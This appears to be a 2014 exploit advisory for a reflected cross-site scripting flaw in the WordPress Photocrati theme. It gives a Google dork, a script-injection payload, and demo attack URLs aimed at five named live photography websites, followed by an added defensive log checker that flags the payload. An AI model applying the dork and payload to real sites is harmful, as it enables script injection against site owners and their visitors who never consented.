WordPress Photocrati Theme suffers from a cross site scripting vulnerability.
2c0a0d09eabe3d8c389700133ca742ee4514f4b658e287ca801e58421be8784e
######################
# Exploit Title : WordPress Photocrati-theme Cross Site Scripting
# Exploit Author : ACC3SS
# Vendor Homepage : http://www.photocrati.com
# Google Dork : inurl:wp-content/themes/photocrati-theme/photocrati-gallery
# Date : 2014-01-29
# Tested on : Windows 7
######################
# Location : localhost/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=[Xss]
######################
# Demo :
#
http://abandonphotography.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=
"/><script>alert(1);</script>
#
http://remingtonphotographyohio.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=
"/><script>alert(1);</script>
#
http://stephimals.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=
"/><script>alert(1);</script>
#
http://justinsweet.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=
"/><script>alert(1);</script>
#
http://riseupgallery.com/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php?prod_id=
"/><script>alert(1);</script>
######################
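
Added example, not part of the original advisory: a log check that flags requests to the ecomm-sizes.php path above whose prod_id is not a plain integer, including double-encoded values. It assumes legitimate product IDs are numeric and that the web server writes common/combined log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script path taken from the advisory's "Location" line.
VULN_PATH = "/wp-content/themes/photocrati-theme/photocrati-gallery/ecomm-sizes.php"

# Start of a common/combined log line: client, timestamp, request line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_lines):
    """Return (client_ip, decoded prod_id) for hits on the vulnerable script
    whose prod_id is not all digits (assumption: real IDs are numeric)."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        # endswith() also covers WordPress installed in a subdirectory.
        if not unquote(parts.path).lower().endswith(VULN_PATH):
            continue
        params = parse_qs(parts.query, keep_blank_values=True)
        for raw in params.get("prod_id", []):
            value = fully_decode(raw)  # parse_qs already decoded once
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((client, value))
    return hits

def _line(ip, target):
    """Build one constructed access-log line (documentation IP ranges)."""
    return f'{ip} - - [29/Jan/2014:10:00:00 +0000] "GET {target} HTTP/1.1" 200 512'

# Constructed sample input: benign hit, encoded, double-encoded, other path.
SAMPLE_LOG = [
    _line("192.0.2.10", VULN_PATH + "?prod_id=12"),
    _line("192.0.2.44", VULN_PATH + "?prod_id=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E"),
    _line("192.0.2.45", VULN_PATH + "?prod_id=%2522%252F%253E%253Cscript%253Ealert(1)%253B%253C%252Fscript%253E"),
    _line("192.0.2.10", "/index.php?prod_id=%3Cb%3E"),
]
```

Hits returned by suspicious_requests() are candidates for review; the underlying fix is still for the script to validate prod_id as an integer and HTML-escape it before output.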